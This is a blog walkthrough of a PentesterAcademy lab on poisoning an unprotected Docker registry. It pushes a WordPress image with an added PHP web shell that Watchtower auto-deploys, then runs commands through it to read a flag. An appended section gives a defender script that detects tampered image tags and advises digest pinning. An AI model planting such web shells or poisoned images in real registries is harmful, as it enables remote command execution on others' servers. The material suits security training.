Where Notes Work
Corrupting Source Image – Docker
Hello friends! In this post, I'll share how I solved the PentesterAcademy Corrupting Source Image Docker lab.
Scenario: The target docker server is running a webserver image that is serving on port 80. The docker image used for the webserver is stored on the unprotected private docker registry present on the same network. A watchtower instance deployed on the target server ensures that the latest image present in the private repository is used for the webserver container. A flag is mounted from the host machine into /tmp directory of the webserver container.
The /etc/hosts file contains entries for targetserver and registry; registry:5000 is the address where all images are stored.
Running curl against targetserver on port 80 reveals that it is running a WordPress website.
If we check the available images in the registry, we find that there are 4 images, including WordPress.
Let's pull the WordPress image from registry:5000.
After that, we will run this image in detached mode, and then in interactive mode.
Now, if we look in the /tmp folder, we don't find the flag, since it is only mounted into the webserver container on the target server. To get it, we can create a new modified WordPress Docker image and add a web shell to it.
Creating shell.php and a Dockerfile, and building the image:
root@localhost# vim shell.php
<?php
$result=shell_exec($_GET["cmd"]);
echo $result;
?>
root@localhost# vim Dockerfile
FROM registry:5000/wordpress
COPY shell.php /app/
RUN chmod 777 /app
Now our web shell is added to the new WordPress image. We wait some time for the watchtower to auto-deploy our image; after 2-3 minutes, if we curl targetserver with the id command, we can see the reply coming back.
root@localhost# curl "targetserver/shell.php?cmd=id"
Now if we run ls on /tmp, we can see that the flag is there.
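A defender-side check for the condition this lab relies on (a mutable tag in a registry that anyone can push to), as an added example that is not part of the original post or the lab. It compares the manifest a tag currently points to against a reviewed baseline and reports layers appended on top of it. The function names and the sample manifests are constructed for illustration; the manifests follow the Docker image manifest schema 2 layout.

```python
import hashlib
import json


def manifest_digest(raw: bytes) -> str:
    """Content digest of a manifest: sha256 over its exact bytes."""
    return "sha256:" + hashlib.sha256(raw).hexdigest()


def layer_digests(raw: bytes) -> list:
    """Layer digests in order, base layer first."""
    return [layer["digest"] for layer in json.loads(raw)["layers"]]


def check_tag(pinned_digest: str, pinned_layers: list, current_raw: bytes) -> dict:
    """Compare what the tag points to now against the reviewed baseline."""
    digest = manifest_digest(current_raw)
    if digest == pinned_digest:
        return {"status": "ok", "digest": digest, "added_layers": []}
    current = layer_digests(current_raw)
    n = len(pinned_layers)
    # An image built FROM the baseline keeps its layers as a prefix
    # and appends one layer per COPY/RUN instruction.
    if len(current) > n and current[:n] == pinned_layers:
        return {"status": "derived", "digest": digest, "added_layers": current[n:]}
    return {"status": "replaced", "digest": digest, "added_layers": []}


def _manifest(config_char: str, layers: list) -> bytes:
    # Constructed sample manifest; all digests are fake placeholders.
    return json.dumps({
        "schemaVersion": 2,
        "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
        "config": {"digest": "sha256:" + config_char * 64},
        "layers": [{"digest": d} for d in layers],
    }).encode()


BASE_LAYERS = ["sha256:" + "a" * 64, "sha256:" + "b" * 64]
EXTRA_LAYERS = ["sha256:" + "d" * 64, "sha256:" + "e" * 64]
BASELINE = _manifest("c", BASE_LAYERS)                 # reviewed image
TAMPERED = _manifest("f", BASE_LAYERS + EXTRA_LAYERS)  # same tag after a push

if __name__ == "__main__":
    pinned = manifest_digest(BASELINE)
    print(check_tag(pinned, BASE_LAYERS, BASELINE)["status"])
    print(check_tag(pinned, BASE_LAYERS, TAMPERED))
```

Deploying the image by digest instead of by a mutable tag, and requiring authentication for pushes to the registry, removes the condition the lab depends on.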
If you face any problems with this challenge, let me know in the comment section.